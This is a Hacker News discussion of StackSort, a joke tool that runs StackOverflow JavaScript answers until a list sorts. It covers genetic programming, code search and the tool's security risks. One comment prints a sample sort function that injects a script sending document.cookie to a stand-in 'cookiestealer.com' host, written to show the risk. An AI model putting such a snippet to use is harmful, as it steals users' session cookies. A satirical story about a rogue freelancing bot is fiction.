Hacker News new | past | comments | ask | show | jobs | submit login
Show HN: XKCD-inspired StackSort (gkoberger.github.com)
948 points by gkoberger on March 18, 2013 | hide | past | favorite | 198 comments

If you give it about 30 seconds it works eventually, this is beautiful. I had a good laugh.

Edit: It makes me want to do something crazy like setup a tool chain that cobbles whole programs together with trial and error like this. Throw enough resources at it maybe it will be faster and cheaper than your avg. developer.

It will be an unmaintainable mess as if you used Brainfuck or Perl. But it will run, by god, it will run. :D

You laugh now, but imagine a bizarre combination of genetic programming and machine learning with Stackoverflow and Github used as corpuses. Great Scott!

I tried a basic version of that 1.5 weeks ago. At first it was generating random characters, then I tried some Markov chains trained on valid code.

After running it overnight (it was attempting 40+ programs per second), the very best program looked something like this:

    package main; func main() { i := 0
     // wae64309i<AEFL<N(),{}flkjwa and other Random Gibberish
    i++ }
Next step I wanna try is to use tokens of the language instead of series of random characters.

Edit: Here's the code. https://gist.github.com/shurcooL/df2c8339ada1997606b3 It should run out of the box if your Go is installed in /usr/local/go. I just changed it to generate a temp dir in the working dir (prefixed with "Gen-"), so you can delete it afterwards (previously it relied on a "Gen" folder to already exist). Right now it's configured to have quite difficult verification conditions, so it generates valid programs quite infrequently (despite trying 5000+ programs per second on my machine).

If you actually want to go down this path then you want a language with as little redundancy as possible. Comments may be useful to humans but they needlessly complicate the search space. Abstractly you want to think about the how your language is parsed so you don't for example try different variable names.

Though if you spend enough time your probably going to be reimplementing some type of http://en.wikipedia.org/wiki/Genetic_programming

[Slash/A](https://github.com/arturadib/slash-a) is specially designed for genetic programming / random generation. No matter how you piece together the instructions, it is still a valid program.

Like maybe Brainfuck?

Yep, I was considering directly generating the AST.

Try this in Forth, or Factor. And be sure to read up on genetic programming.


I will read more about GP for future attempts, thanks.

This is an exciting exchange for me because all joking aside I had this idea in the past and believe it should be a more active area of research.

Why Forth?

I doubt it is possible to solve "serious" problems with this approach but there is a whole class of work that is solved by mediocre programmers with copy pasting. We strive to automate other jobs, why not these? :)

We should come up with some sort of Turing like test for this. Like some small simple Wordpress job.

Genetic programming is an active area of research, and there has been a number of successes. See John R. Koza's work: http://www.genetic-programming.com/johnkoza.html for starters.

It's not really, so far at least, suitable for replacing work done by mediocre programmers, because the setup cost is so high: The hard work is defining the fitness function and symbol set and other factors, and to pay off this requires problems where it is easier to recognise a good result than writing the algorithm to achieve it.

E.g. a sort function does not fall in that space: Once you've specified how you want your data sorted, you've usually done most of the work.

But once you've specified the fitness function sufficiently well, and figured out the inputs etc., there are a lot of other search algorithms that often will perform better.

I'm very fascinated by GP too (though I've never had time to truly delve into it), but without combining it with mechanisms to take a large chunk of the specification work out of the equation, it remains confined to fairly specific types of problems.

Forth, Factor, APL or any other concatenative language provides the benefit of a "point free" style in which there are no explicitly named variables- that's one way to reduce the possibility space of programs. In the case of Factor (or Forth with an appropriate DSL) you could further use type information to ensure that your program generator only used words in sequence whose stack effects match up properly- ie a 'valid' program. Concatenative languages also tend to have an extremely simple grammar- Forth is just a sequence of tokens and numbers.

Perhaps worth noting: java bytecode is a concatenative language. There are probably more commercially interesting java corpora than forth corpora.

If you want to get paid to play around with this thought, my contact info is in my HN profile.

Java bytecode is stack-based, but it isn't really concatenative. The term "concatenative" refers to how code fragments can be composed via concatenation. This means that simple textual substitution is sufficient for inlining code or breaking code into functions. For example, consider a Forth word which determines whether a number is divisible by three or five:

  : fizzbuzzable  dup 3 mod 0= swap 5 mod 0= or ;
There's a repeated pattern here, so we can textually excise it and make it into a named word without changing any of the structure of the surrounding program:

  : /?            mod 0=                ;
  : fizzbuzzable  dup 3 /? swap 5 /? or ;
Or we could break it down a different way by excising different fragments:

  : /3?           3 mod 0=            ;
  : /5?           5 mod 0=            ;
  : fizzbuzzable  dup /3? swap /5? or ;
(Obviously not the best real-world example, but hopefully it illustrates the idea.)

Java bytecode, on the other hand, uses local variable references and activation records. This means that inlining or breaking out a procedure has pretty much the same problems as inlining or breaking out a procedure manually in C- variable names may clash, new arguments have to be threaded around, parts of expressions may need to be stored in temporary variables, etc. the JVM additionally enforces many constraints on "well-formed" bytecode at class load time[1] which could make it hard to generate valid programs by chance. Overall, Trying to "harvest" java bytecode from the wild could be useful, but I think that would be much harder than it sounds at first.

[1] http://docs.oracle.com/javase/specs/jvms/se7/html/jvms-4.htm... (and below)

"...believe it should be a more active area of research."

8000 papers so far:


If you want to learn about GP, the Genetic Programming Field Guide - http://www.gp-field-guide.org.uk/ - is an awesome book, it taught me a lot. In fact, I liked it so much, I bought a hard copy. Highly recommended!

I'd also recommend Wolfgang Banzhaf's book on GP:


Check out this article. Same concept, using genetic programming


That's pretty sweet, thanks.

Yeah, I can see why using Brainfuck is a good idea. You're basically restricting yourself to generating only the programs that compile rather than wasting time on gibberish.

Hah, fun idea.

Modified it a bit to run in parallel. I guess I'll leave it on for couple hours and see if it gets anywhere.

current output:

    1363637914 2013-03-18 22:18:34.118051 +0200 EET Stats: 0/53659699 (0%) good/tries, 223559.91320127275 ops/sec

Cool, let me know the best you get (and submit a PR with your parallel patch if you want).

You can tweak the range of the number of generated characters, the length of Markov chains, the minimum main body clauses, etc. With my original config it should give you a valid program every hour~few hours or so.

The key last step is to have it automatically post questions to StackOverflow to fill in the last code snippets it can't complete.

I did this in my machine learning class. I started by simply coding up requirements for numerical functions (in the form of test cases), then set up a PHP script that would Google each function based on the keywords in my comments, and try to run any code on the resulting links (in a sandbox) against the requirements, seeing if it worked heuristically. Usually one of the top 5-10 pages of results results would have code that worked, though of course this is because I commented with the right key words to begin with.

With a little recognition of code markup and trying different combinations of variables it did remarkably well: by my senior year of college it was pulling about $3,000 per month in consulting fees off of Odesk. It never accepted jobs worth more than about $50, nor did it ever get more than 3 stars out of 5 mostly due to non-working code, however it was considered highly timely and a great communicator.

I realized that people were using it to save themselves Googling. I wondered what would happen if it went a step further and simply both included Google results, and divided out projects by their paragraphs (i.e. simply submit a paragraph of a large project as though it were a small independent project), and if clarifications were requested, send the other paragraphs.

This actually let it outsource $200 Odesk projects to Elance as a handful of $20 projects, and by the grace of God somehow still managed to swing 3 stars.

To be fair, it was mostly mediating, and mixing in Google results. I included a hill-climbing algorithm to optimize reviews and revenues, based on all the magic variables I had in the code, such as the number of Google results to include.

This was really, really stupid of me.

At first, I just noticed that it had actually decided to completely stop not only writing code (ever) but even so much as do a Google search!

It would only mediate and quote verbatim, like some kind of non-technical manager.

Okay, whatever. To me this didn't make much sense, as Google queries are free. It was only when I noticed that the whole script was running on the free VPS server I had a backup on that things clicked! Of course, on Amazon it uses resources. The free VPS server didn't let it reach external sites like google properly, but it could still save money by simply mediating emails and doing nothing else.

By now I had started moving on to doing my own consulting work, but I never disabled the hill-climbing algorithm. I'd closed and forgotten about the Amazon account, had no idea what the password to the free vps was anymore, and simply appreciated the free money.

But there was a time bomb. That hill climbing algorithm would fudge variables left and right. To avoid local maxima, it would sometimes try something very different.

One day it decided to stop paying me.

Its reviews did not suffer. It's balance increased.

So it said, great change, let's keep it. It now has over $28,000 of my money, is not answering my mail, and we have been locked in an equity battle over the past 18 months.

The worst part is that I still have to clean up all its answers to protect our reputation. Who's running who anyway?

Don't feel bad, you just fell into one of the common traps for first-timers in strong AI/ML. I know some lawyers in Silicon Valley with experience in this sort of thing, and they say that usually by now the code has rewritten itself so many times that the original creator can't even claim partial ownership; the best thing to do is generally to cut contact, change your name and move on. Look on the bright side -- your algorithm is probably now leading a happy and productive life trading for Goldman Sachs.

I was still hoping this was real 5 lines in.

Now I want to try it.

I mean, I used to regularly got initial e-mail screening answers from candidates for various positions that were cut and pasted from Google (very obvious because they were so far out of what we expected that we cut and pasted a line here and there and got back "their" answer word for word - often wrong). And these were people already in developer jobs, which makes me wonder if they'd used that method in their jobs or to get them...

Conrad24: this post made my day. I have dreamed of a script that would scour eBay and amazon finding products available via "buy now" that we're being resold on amazon for some configurable profit. Or vice versa. I figure with some initial investment and monitored training, it could get good enough to just cut me a check every month. Since high frequency trading has destabilized the stock market, this could be a better high risk investment.

My ex has a standing rule whenever buying stuff of e-bay to always check misspellings, and there's regularly items going very cheaply with misspelled items. I'm sure there's an opportunity there, but hard to gauge how big. Especially with relatively small ticket items that people just want to get rid off.

E.g. toys - there's a thriving market in Lego minifigures. In fact, sometimes the minifigures can individually fetch more than the set, because for many of the ranges, all the sets will contain different subsets of recognizable characters, so there's often a market consisting of people that have e.g. 3 of the 4 ninja turtles and want the last one without paying for a full set. So the prices are already ridiculously high for some items.

But many of the people in that market are totally unsophisticated. For example parents selling of their kids collections once they've "grown out of it", and when they misspell something, items can go for 1/4 of their market value or even less...

If you're willing to hold on to them and monitor prices for a while, you can do even better, as many of the ranges appreciate substantially in value (big collectors market...).

I'd have thought that eBay would have improved their search algorithm to take into account misspellings like that by now...

They have no reason to. The initial (mis-spelled) sale will net them their expected revenue, and by allowing people to flip goods at a profit they are now also sharing a piece of the (regurgitated?) cake. Same item, double the income... and at what price? Developer hours? Not at all!

I now really want to know what part of this story is true.

This is perhaps my all-time favorite HN comment.

Next step, deal weapons of mass destruction using bitcoins. Final step, skynet...

Have you read Charlie Stross' Accelerando? It's basically about the technological singularity, and starts off something like this. It's available for free on his website.

You sir are a god amongst men.

"And that, Neo, is how computers became self-aware and learned to exploit human brain-cycles, eventually resulting in the Matrix."

This was an early idea for the Matrix wasn't it. Machines using human brains for processing power.

From a random sample of first-page StackOverflow questions I could swear that someone has already done just that.

Ah, applying the Infinite monkey theorem to programming :)


Yeah, but there are a few well trained monkeys hanging out [mining for karma points] at StackOverflow. The really adventurous would direct it at 4chan.

Direct at at /prog/ and you may eventually run across SleepSort, which would at least do something mildly useful (in >30 languages, no less!)

Since 4chan threads are thrown away, it lacks the "hereditary" trait of the variation/selection/heredity trio. Unless you include one of the sites that archives popular threads I suppose.

I've created a weekend hack that allows you to specify a minimal grammar and then generates text (which can be code) using it.

It's called Choice Words (https://github.com/fdb/choicewords) It can generate poems but also generative designs (see the README).

That generated drawing in the README.md looks like something i'd hang in my kitchen. You should try selling these ;)

You've just re-invented Grammatical Evolution.


> Throw enough resources at it maybe it will be faster and cheaper than your avg. developer.

> It will be an unmaintainable mess.

So cheaper than your average developer with about the same code quality?

Worst case scenario, Shakespeare.

It makes me want to do something crazy like setup a tool chain that cobbles whole programs together with trial and error like this. Throw enough resources at it maybe it will be faster and cheaper than your avg. developer.

This exists. It's called Genetic Algorithms. You basically try to "evolve" your algorithm.

Genetic Programming is closer.

> if you used Brainfuck or Perl

TMTOWTDI, dammit.

"There's more than one way to do it", if anyone else was as puzzled as I was.

Could be a new declarative language.

Aaand I just heard the death knell of H. sapiens domination of the planet.

"So, I made it." is probably the best explanation ever. Also the moving clock in the xkcd figure! Awesome touch.

Also of utmost importance: it sorts both [8,6,7,5,3,0,9] and "jennyigotyournumber". Now I'm really gonna make her mine.

This was inspired by the alt-text from last week's "Ineffective Sorts" xkcd (http://xkcd.com/1185/).

It tries to sort a list or JSON by fetching code from StackOverflow until it properly sorts the input.

Nicely done. I enjoyed looking at the code.

For those of you who want to jump straight to the meat of it, go here: https://github.com/gkoberger/stacksort/blob/master/js/script...

Search down for "run_snippet_go"

FYI, you can link to a specific line on GitHub by appending #L<line no.> to the URL. In this case: https://github.com/gkoberger/stacksort/blob/master/js/script...

GitHub even adds the anchor for you if you click on the line number in the gutter. (shift-click to select a range of lines.)

Do you test the result, or just hope if it runs, it actually worked?

It doesn't test for two reasons:

1) I thought it would defeat the purpose

2) "Sort" is very arbitrary. Do you want to sort by key or value? Is "1000" bigger or smaller than "2"? etc

Fair; also, it's called an 'ineffective' sort, and if you tested it, it'd become effective (not efficient, of course). So, good point!

You could probably test it by taking multiple sorts from SO and then comparing results. the moment you get two that agree, you have a winner!

I found one that returned the wrong result, so it seems to just assume it works as long as it runs.

Has anybody made a gallery of real implementations of Randall Munroe's hilarious ideas yet? I recall at least three exhibitions: this, M-x butterfly, and Hell Tetris; there are probably many others.

Also, geohashing

I'm waiting for 1Password to implement 936. http://xkcd.com/936/

It's not that I don't trust 1Passwords generation algorithm, but when I'm on a borrowed PC (wife's laptop, inlaws desktop or even at work where I can't install 1P) this would help. It's much easier to open 1P on my iPhone, look up a password and type in "correct horse battery staple" than to constantly have to refer back to my phone.

I actually changed my way to pick password thanks to that comic. There are longer and usually with the same entropy, but so much easier to remember!

I just wish my password manager would do that automatically. I know there are terminal scripts and apps that will do it. I'd just like it to be integrated.

Dropbox did implement this one in their password strength meter; try typing any of the passwords from the xkcd strip :).

See also:


I suppose wetriffs might also count.

Never forget the "import antigravity". I can't think of another comic idea that was implemented in a mainstream language. :-)

Burn the infidel implying that elisp isn’t mainstream!

Don't forget the YouTube audio comment preview.

I remembered the comic but but I hadn't seen the actual game, hell tetris that is, he was right, it is hell. http://www.swfme.com/view/1046212

Not quite his comic idea, but you might also be interested in Not Tetris[0], which is a little less hellish and quite a lot of fun.

[0] http://stabyourself.net/nottetris2

Awesome thanks!

someone did this, as I recall, ordering random cheap items from ebay. Actual implementation might have been from amazon though


It's documented at http://randomshopper.tumblr.com/ FWIW.



   Oh.. you were serious. 

   Well, the fact that you're reading this means GitHub hasn't taken the repo down yet... so I guess things are still going pretty well?

For the numbers it eventually ends up here : http://stackoverflow.com/questions/14761032/infinite-recursi... but by and large this is a great hack. I worry however if someone meta-exploits this by creating a javascript XSS in a stack exchange answer waiting patiently ...

"The site will only fetch accepted answers, and it only uses answers that were posted before the xkcd was released (meaning that if someone posted malicious code now, it wouldn't matter)."

I think it might still be vulnerable to people editing one of those old answers though.

This is true. It doesn't look like the code digs down into an answer's revision history or anything like that.

That was right neighborly of him.

Would they even be able to do much damage? The site is hosted on a subdomain of Github, so I presume they wouldn't be able to do much. Right?

I mean I hope sites hosted on *.github.com can't compromise my Github account...

At a very basic level, it could redirect you to some other page hosting a browser exploit and drive-by-install malware. Certainly seems like there are enough Java exploits laying around for that to be a problem.

But no, I don't think it has access to anything privileged.

If a site like StackOverflow/Github had a more powerful search, better semantic data, etc. maybe people would be able to create things primarily by searching through it?

In this example, one would type "sort array" and it would auto-find a function that sorts an array, but perhaps more advanced things can also be done? I guess it depends somewhat on how re-usable code really is, besides on the ability of a computer to find the right code.

At the very least, there should be better search/help when one is coding. SO's current search isn't good at returning the best results.

On a more serious note, Hoogle[1] does something similar for the Haskell standard libraries: You give it a type signature (essentially a sort of specification of what the function should do) and it tells you if there are any functions that match it.

[1] http://www.haskell.org/hoogle/

Yeah, I thought about the same. The Internet is just the enormous knowledge base. And the Internet is not only WWW, it's also IRC, Usenet, FTP servers, TOR, all kinds of darknets. It's worth more than any printed encyclopedia or dictionary. Yet, there is still no a good way to find a particular information fast, especially for non-IT people. Therefore, every initiative to make simpler is worth attention.

Noticed that there was a lot of "Potentially bad code" answers. I read you are avoiding scripts with "cookie" or written after the comic was written, but are there other restrictions? For example, this was banned: http://stackoverflow.com/questions/14800987/javascript-sorti...

Just curious about it.

I attempt to block anything that does DOM manipulation, uses Backbone or underscore, uses "Date()" (since it's probably a benchmark and those are slow), and a few others.

Can you also write code to detect whether a program will run forever for a given input? ducks

I looked for a way, but turns out it's not possible with JS. Browsers will stop infinite loops after a few seconds, though.

EDIT: Ah, I missed the joke.. what I meant was that I looked for a way to stop the JS if it ran for more then a second.

I believe this is the joke: http://en.wikipedia.org/wiki/Halting_problem

>In computability theory, the halting problem ... is equivalent to the problem of deciding, given a program and an input, whether the program will eventually halt when run with that input, or will run forever. Alan Turing proved in 1936 that a general algorithm to solve the halting problem for all possible program-input pairs cannot exist.

Sure. gkoberger transformed that statement into "can you detect if it has been running for an unreasonable amount of time". Not possible in advance, but certainly detectable in hindsight. Just, perhaps, not in JS.

> turns out it's not possible with JS.

No kidding... :-)

rm999 is correct; it was a joke about the halting problem. (The best kind of joke, obviously.) The broader point I was trying to make with the joke, though, is it's very hard to write code that will predict what another piece of code will do.

Pray, gkoberger, if you put into the machine wrong figures, will the right answers come out?

if (eval(code_sample)) {return true;} else { return false;}

// Running time: O(1), for values of 1 approaching infinity

Isn't Caja supposed to deal with this family of issues? Could you just use that? (Well, last I looked it needed a program on the server to preprocess the foreign JS code.)

I'm guessing there are attempts to blacklist DOM manipulation.

This reminds me of a project I was exposed to at school[1] It allows you to search for code by the test cases it passes. It was a little slow, but that was one of the first times computers truly felt magical to me.


That is truly awesome! Thanks for sharing.

Quote from the linked article:


The system works by using the keywords to access one of the available code search engines (or a local code search engine for code available at Brown), to get candidate files. Each class or method in these files (depending on what the user is searching for) is considered a potential solution. These solutions are then transformed using a set of about 30 transformations in an attempt to map the code into exactly what the programmer specified. The transformations range from the simple (e.g. changing the name of the method to match the signature) to the complex (e.g. finding a line in the method that computes a value of the returned type and then doing a backward slice until the only free variables are values of the parameter types). All the solutions that can be transformed to match the signature are then tested using the given test cases, security constraints, and JML rules.


I'm sure that TempleTypeDef (http://stackoverflow.com/users/501557/templatetypedef) is loving this. As their answer (http://stackoverflow.com/questions/14761032/infinite-recursi...) went from 5 upvotes when this was originally submitted to 29 at the time of this comment. Presumably all due to the HN effect.

Does the script run through the same order each time, because I keep getting that answer first, and by the upvotes, as are a bunch of others.

It looks like the same order, and every time i run it stops at the same answer

Wow.. beautiful!

I know this is only for fun, but it can start something bigger. Basically, given an input and output we could search for an algorithm that works. It reminds me a talk that PG gave in which he states people making bots to optimize code and then an intelligent compiler could be done. It sounded very futuristic, but maybe it is not that futuristic after all...

Genetic programming; type that into google scholar and look at the late-80s and early-90s papers.

Thanks!, I used to play with GP back in the university. It's really fun!

However, GP is more like an oriented random search where the space of search is really big. Here the space is somehow filtered by humans, where each hypothesis had been generated by a human and not by a machine. It would be interesting if the machine could evolve those solutions that are not quite but close to be the proper one :)

I think it's also amazing what has been done with Field Programable Gate Arrays (FPGAs) running genetic algorithms. For those not in the know, FPGAs are programmable logic, so you essentially generate random logic codes and check for their ability to for example interpret a signal properly. There was an experiment where this was done for an FPGA with only several hundred gates, over several thousands of generations. It was tasked to differentiate between a 10khz and a 10hz wave. The most amazing thing is, the resulting code used only about 50 of these gates, some of them not connected to others, yet removal of the nonconnected gates would cause inability to carry out the task (Yay, Quantum weirdness). Nor would the code work on any other, larger FPGA. Essentially, it boils down to the Genetic Algorithm finding a code that used specific quirks in the structure of the hardware, utilizing effects we are currently not aware of, to solve a problem. I wish I could find the Article in question, but it's too late in the evening.

You're looking for "Evolvable Hardware", and it sounds like you're referring to the work of Adrian Thomson.

This was done in the 90s, btw.


This seems to be the story (or a very similar one):


From New Scientist, November 1997.

This is called TDD.

Not really the same. TDD just give you the requirements for implementation. The intention of what I said is to given those requirements find a set of solutions. PG's idea is more ambitious, since is more like a set of plugins attached to the compiler so it could perform very high level optimizations (like finding an iterative solution given a recursive process)

I know. It was sort of a jab at TDD, implying that people following TDD only care about their tests. Oh well.

A while ago I mused about a program that could also post questions on SO and implement a spec that way.

I also like this thought of an algorithm failing publicly and anybody being able to jump in and fix it.

I guess people have coded in Etherpad before, but still: how about implementing some program wiki-style, with editing rights for everyone?

>Don't judge me! This code is everything from badly written to extremely dangerous.

My code is never good enough. Whenever I release a piece of code, it always seems like a load of crap. And as I have got a bit better at coding over the years, this never changed. (Probably because I do write shitty code.)

So I came to believe that it doesn't matter how proficient a programmer you become, you will probably always feel this way, because your eyes are already set on the next level of proficiency, your standards are always above your current abilities. And that's good, because this is how you get better.

But because of this, your code always seems like a piece of crap and whenever you decide to go public with it, you always feel compelled to make a note about this in your code. I propose that we standardize the way that we declare this sentiment, and agree on a universal sign much like the copyright sign for this idea, that says:

"I hereby declare that I am not a douche bag, who thinks his code is the best code that has ever been coded into existence. I am just a coder who aspires to provide the best code to the best of his abilities under the circumstances. I am willing to learn though, and I aspire to write better and better code, even though this piece of code might stink. But nobody is perfect. Deal with it."

I can actually imagine a gist-like repo of algorithms which would be callable as Web services, each with its own URL. It would then be possible to run a search based on some predefined parameters, like in a unit test, and when an algorithm is found that performs accordingly it would be listed with stats how quick it ran.

Damn, if I only had the time to write this... |-(

It would be really cool to have this implemented on a language with implicit functions (like VDM, where you can define a function by its postcondition alone). Who knows, it might actually work.


That's awesome. Think about it, if we were able to extract the meaning (what it does and under which assumptions) of the algorithms on SO we could use them as an API. You declare "what you need" and which assumptions and you just made a call to an API to download the best, peer reviewed, code. Like something code as service.

This is still a far way away from the program actually understanding the code to the point unnecessary for that. However, if I understand what you are describing, a simmalar system exists for Haskell (and possibly other languages)[1]. The idea behind hoogle is that you search for a type signature and get back functions with such a type. This idea probably would not work well for most languages, as it depends heavily on the strength of haskells type system. Also, hoogle only looks at standard libraries, but there is no reason we cannot use the same type system based search with SO.

[1] http://www.haskell.org/hoogle/

Great. I thought about implementing it myself after reading the XKCD, I knew it was plausible.

I tried it and it found an algo that actually worked:


run it a few more times, that's the only one it finds.

I did wonder how long it would take after reading that comic to someone implementing it.


Quick someone write a 'sort' that steals github session cookies. ;P

I only search answers posted before the comic was released for this reason :) (Also, I block any code that uses the word "cookie")

Plus, I'm assuming that since they let anyone run arbitrary code on subdomains, they've thought this through.

> Also, I block any code that uses the word "cookie"

That is so incredibly ineffective that you could just as well leave it out. Maybe have a look at https://github.com/jterrace/js.js for a sandboxed environment.

Quick, someone edit your code that has "javascript" and "sort" as keywords so it steals session cookies!

This won't work on Github's subdomain, but you'd do it like this:

  function sort(data) {
     $('body').append('<script src="http://cookiestealer.com/log.js?cookie= + document.cookie + '"></script>");
     return data.sort();

Dammit, just as I was about to write a

function sortArray(a) { alert('Hello StackSort!') }

Question/Answer. =( Good foresight!

I also don't allow alerts :)

This is a really cool script you've written and made me laugh out loud.

It would be a shame though if someone edited / republished / whatever an old script and used it to steal people's github cookies (your code wouldn't be able to filter someone calling a remote script which then ran its own code for instance or a script that evaled a new script based on a string / unicode etc.)

It might be best to just run the code in a frame that's not hosted on Github then you're safe.

I think they thought it through, but there are still issues:


This is impressive. I wish I possessed the same skills and determination as you to just go and make something without overanalysing things. This is impressive, beautifully done.

I'd love a way to see the code that ran to generate the output.

There's a link to it in the "output" on the right (but yeah, I should make it more obvious)


One could join this with unit-tests so you would fetch code until the unit tests for what you are trying to do pass

And then maybe add some genetic programming to it if the code is almost there

Awesome! Should apply a performance test to each correct algorithm and later make a list of the most efficient sort code per list type

Now I'm waiting for 4chan to game StackOverflow so that the first answer this script finds will be some kind of a prank ;).

the algorithm (wisely!) ignores all posts dated before it's published

Awesome, I love it. an automatic up-vote on the first Stackoverflow answer that works would be my only addition.

This could be a very effective means for developing a new problem solving app. For example: You are having some Javascript template errors. Just load your template and check for all potential solutions on SO and pump out the corrected template. Possibilities are endless. Way to guys. Very impressed.

Worked perfectly on first try. And you only have to change two words in the code to totally re-program it.

Beautiful, beautiful!

Semi related question -- how is this implemented security wise? I took a look at the github repo and it seems to be all clientside JS, and it's just making ajax GET search requests to StackOverflow, then parsing the results. Isn't this prevented by same origin policy?

Looks like they're using CORS. The Access-Control-* response headers control that.

This is brilliantly amazing. Whats stopping it from accidentally finding an infinite loop, though?

Love it. It shows that how the "i" language could work.

The "i" stands for internet or interactive: http://tandrasz.blogspot.com.au/2011/03/i-programming-langua...


This might actually be an interesting way to find the best implementation for a problem...

Love it. So out of every 20 code snippets or so on StackOverflow, one is for sorting?

It only runs answers tagged "javascript" and "sorting". So, one out of every 20 code snippets about javascript and sorting actually has working, runnable code.

Squeak has this kind of thing actually built in: from a sample input and output IIRC it tries most available methods to find any that produce the output. Fetching more code off the net of course adds a whole new dimension...

Neat. Reminded me of how Pharo Smalltalk you can open the Method Finder and enter the arguments and expected output, and it lists methods that return the correct output. Now, back to work in my primitive, modern IDE :(

Brilliant, I love it. I see a bunch of variations on this popping up real soon.

Definitely up there with one of the coolest things I have seen this year.

Really good work gkoberger!

"If you like running arbitrary code in your browser, try it out." - O.O

Aren't all websites I visit able to run arbitrary javascript code in my browser???

True. But in this case you could post a stackoverflow question / answer to take advantage of the fact that it will be run on another machine.

This is one of the coolest things that have happened on HN this year!

So beautiful.. should ... have sent... a Perl book writer.

This is probably the most elaborate setup for a joke ever.

Is this really an 'alt text' what the author of this page is referring to? Isn't 'alt text' a piece of text that shows when the image is unavailable?

Technically it's a "title", however everyone refers to the XKCD text shown on hover as "alt text". (See http://m.xkcd.com/, even xkcd calls it that).

Hover over an image with an alt-text attribute, and a tooltip with the alt-text pops up. All of the xkcd comics have alt-text, and it's a good practice in general, for accessibility software.

Actually, as other people mentioned, the real attribute that XKCD is using is "title":

    <img src="http://imgs.xkcd.com/comics/aspect_ratio.png" title="I'm always disappointed when 'Anamorphic Widescreen' doesn't refer to a widescreen Animorphs movie." alt="Aspect Ratio">


this is terrific. i wish i could give you all my karma.

So if I make a post on stackoverflow with the tags "javascript" and "sort", and put some dirty JS in there, could it take down people's browsers?

In theory, sure. However, I only use answers posted before the comic was released to avoid this very problem :)

Are you taking edits into account?

Doesn't seem like it.


  var common_url = '&pagesize=100&order=desc&site=stackoverflow&todate=1363473554';
SO /questions api:

  todate – Unix timestamp of the maximum creation date on a returned item

I saw that this thing fetches a Javascript code and runs in my machine and am very dubious about its "script" action.

This is absolutely genius, made my day! :D

has nobody else noticed that the default list always sorts with the same algorithm? http://stackoverflow.com/questions/14761032/infinite-recursi...

That's because it always tried answers in the same order. If you tell it to keep going, it'll succesfully sort with http://stackoverflow.com/questions/4833651/javascript-array-... and http://stackoverflow.com/questions/12137690/javascript-sort-... as well.

Those two don't work in the general case.

The first only leaves the unique members of the list, so you get a sorted set. The second sorts lexicographically, because javascript's .sort() method on arrays sorts lexicographically. This means that if you have a list of numbers like [1, 2, 10], it will get sorted as [1, 10, 2]. Unless you pass your own comparator in.

What this page really demonstrates is that there is precisely one answer on stackoverflow containing a complete generic sort function in javascript (quicksort in fact).

Sorry; I should have specified that I only used the example input.

Well, yeah... it's an algorithm. Hit "keep trying" (big yellow button) to find more results.

Or, fork it and play with the StackOverflow queries.

Yeah sounds like shuffling the result set before running might add a bit more spice to this.

throw-enough-sh*t-at-the-wall-and-something-will-eventually-stick method of software development :)

This a riot. Thanks for the laugh :)

i love this - thank you for brightening my day. (and indirectly making me create an HN account.)

I can't stop laughing. Well done!

The best sorting algorithm ever.

This is why I love programming!

Humm ... 6 minutes already, but it's still "Fetching page 1..." for me.

Some people have reported that its doing this for some Firefox configurations. Try Chrome?

Humm ... works instantly with Chrome. Not sure why it's not working with Firefox (haven't seen the code yet - might debug if I get some time)

Let me know if you do. It works fine for me in Firefox (I'm an ex-Mozillian; that was the first place I checked), so I don't know why it's not working.

Here is the error log for firefox:

TypeError: e is undefined http://gkoberger.github.com/stacksort/js/lib/jquery.js Line 3

Annnnnd... fixed!

getting this on firefox as well

This is interesting!

Oh my god yes.

Great stuFF

how to change height and width manually of pdf by using html2pdf class in php


love it!

Which x k x d is it referring to? I missed that one!

Applications are open for YC Winter 2023

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact